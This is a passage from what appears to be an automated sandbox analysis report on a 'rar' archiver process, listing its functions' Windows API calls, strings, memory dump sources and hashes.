                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6FAA22E4C), ref: 00007FF6FAA6B287
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
                                                                                                                                                                                                                                • String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
                                                                                                                                                                                                                                • API String ID: 3483800833-4165214152
                                                                                                                                                                                                                                • Opcode ID: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                                                                                                                                                                                                • Instruction ID: 94ee261fc1a9385ac55a5be683edad78f0de478b00dd0b309f0797cf71b70ea4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27C1A032A19B8286EB20DF25D8502BE27A0FF49B94F444075DA6D877D9EF3CD54ACB00
                                                                                                                                                                                                                                Function 00007FF6FAA6B57C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54shutdownCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                • API String ID: 3729174658-3733053543
                                                                                                                                                                                                                                • Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                                                                                                                                                                                                • Instruction ID: 1c256a994f752dad06e7211b1cfcf683460a7e75b5e12f4935db36ec70493e80
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E921D532A2864282F790DB24E45537BB3A1EF89744F505075DA2E866D8EF3ED05F8B00
                                                                                                                                                                                                                                Function 00007FF6FAA3E21C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF6FAA22014), ref: 00007FF6FAA3E298
                                                                                                                                                                                                                                • FindClose.KERNEL32(?,?,?,00000001,?,00007FF6FAA22014), ref: 00007FF6FAA3E2AB
                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF6FAA22014), ref: 00007FF6FAA3E2F7
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA3EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6FAA3EE47), ref: 00007FF6FAA3EF73
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA3EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF6FAA3EE47), ref: 00007FF6FAA3EF84
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA3EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6FAA3EFA7
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA3EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6FAA3EFCA
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA3EF50: GetLastError.KERNEL32 ref: 00007FF6FAA3EFD4
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA3EF50: CloseHandle.KERNEL32 ref: 00007FF6FAA3EFE7
                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 00007FF6FAA3E357
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF6FAA22014), ref: 00007FF6FAA3E362
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                • String ID: SeBackupPrivilege
                                                                                                                                                                                                                                • API String ID: 3094086963-2429070247
                                                                                                                                                                                                                                • Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                                                                                • Instruction ID: cc108312d172db53487d9d71f78b27676038df8b3fdb18a970696c542dbd71bc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B761D432A1878196EB648F21E4412F933A0FB48394F404275DBBE97AD8EF3DD15AC700
                                                                                                                                                                                                                                Function 00007FF6FAA5AF0C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 427COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Sleepswprintf
                                                                                                                                                                                                                                • String ID: $%ls%0*u.rev
                                                                                                                                                                                                                                • API String ID: 407366315-3491873314
                                                                                                                                                                                                                                • Opcode ID: cf0b1d2e1f3f42edb60452bbb24115177953f6343aa4cee769ccba7d12699e54
                                                                                                                                                                                                                                • Instruction ID: e9d18068532cb2ce1d677239b789344c092e67281d46ba9707ed636ea2a608b6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf0b1d2e1f3f42edb60452bbb24115177953f6343aa4cee769ccba7d12699e54
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73020632A046928AEB20DF29E4442ADB7A5FB887C4F400175DE6D877D9FE3CE44AC704
                                                                                                                                                                                                                                Function 00007FF6FAA249B8 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • new.LIBCMT ref: 00007FF6FAA24BD8
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA6B6D0: Sleep.KERNEL32(?,?,?,?,00007FF6FAA3CBED,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA6B730
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA41E80: CreateFileW.KERNELBASE ref: 00007FF6FAA41F4A
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA41E80: GetLastError.KERNEL32 ref: 00007FF6FAA41F59
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA41E80: CreateFileW.KERNELBASE ref: 00007FF6FAA41F99
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA41E80: GetLastError.KERNEL32 ref: 00007FF6FAA41FA2
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA41E80: SetFileTime.KERNEL32 ref: 00007FF6FAA41FF1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CreateErrorLast$SleepTime
                                                                                                                                                                                                                                • String ID: %12s %s$%12s %s$ $%s
                                                                                                                                                                                                                                • API String ID: 2965465231-221484280
                                                                                                                                                                                                                                • Opcode ID: 7d1b61a8460396aa639ed059bb8fcb6c49571c58dc1953f366533a0ff62c8f64
                                                                                                                                                                                                                                • Instruction ID: 7c5831cca1b5b6f4b5239e874dbf19097e9372574a609d53915a31e038c39ce2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d1b61a8460396aa639ed059bb8fcb6c49571c58dc1953f366533a0ff62c8f64
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DBF1C022B09A4286EB60DF12D4412BE67A1FB89B84F4440B6DA6D877C5FF3DD56AC700
                                                                                                                                                                                                                                Function 00007FF6FAA84C10 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                • Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                                                                                • Instruction ID: 14e29c9d2d192cc628f55a479940116135dc5ffc3dc13f1b948b145b73e9c106
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55315936618F8196DB60CF25E8402AE73A4FB88754F500175EAAD87B99EF3CD55ACB00
                                                                                                                                                                                                                                Function 00007FF6FAA3EF50 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3398352648-0
                                                                                                                                                                                                                                • Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                                                                                • Instruction ID: acb44669ce05b53c62a5d24c61770dc4cb6a67e45e6ba3d8319ab381880f78db
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4111843261874186E7908F25F44156BB3B4FB88BC0F544035EA9E83AA8EF3DD01ACB40
                                                                                                                                                                                                                                Function 00007FF6FAA242E0 Relevance: 6.3, APIs: 4, Instructions: 344COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3116915952-0
                                                                                                                                                                                                                                • Opcode ID: 3e455452d26091372e3f028aefc06a1504c9ecf714524aafa6be1edd61abc305
                                                                                                                                                                                                                                • Instruction ID: 17aa7daf4999c733bf0137e0e5145af988b0c7fb54d7af0a48a0a42f6ce799da
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e455452d26091372e3f028aefc06a1504c9ecf714524aafa6be1edd61abc305
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FE18622A18A8682EB20DF26D4505FD63A5FF85784F4540B2DE6D877D6EE3CD51BC700
                                                                                                                                                                                                                                Function 00007FF6FAA43A70 Relevance: 6.1, APIs: 4, Instructions: 74fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,?,?,00007FF6FAA411B0,?,?,?,00000000,?,?,00007FF6FAA3F30F,00000000,00007FF6FAA26380,?,00007FF6FAA22EC8), ref: 00007FF6FAA43AC4
                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,?,?,00007FF6FAA411B0,?,?,?,00000000,?,?,00007FF6FAA3F30F,00000000,00007FF6FAA26380,?,00007FF6FAA22EC8), ref: 00007FF6FAA43B0A
                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 00007FF6FAA43B55
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00007FF6FAA411B0,?,?,?,00000000,?,?,00007FF6FAA3F30F,00000000,00007FF6FAA26380,?,00007FF6FAA22EC8), ref: 00007FF6FAA43B60
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile$CloseControlDeviceHandle
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 998109204-0
                                                                                                                                                                                                                                • Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                                                                                • Instruction ID: 8106b985007448831e7e14a42ee9f9faa3450a5ffa3c58e1e86dfe40760be2d2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90317232618B8186E7608F51B44469AB7A4FB887F4F110235EEAD53BD8EF3DD55A8B00
                                                                                                                                                                                                                                Function 00007FF6FAA28884 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 324COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
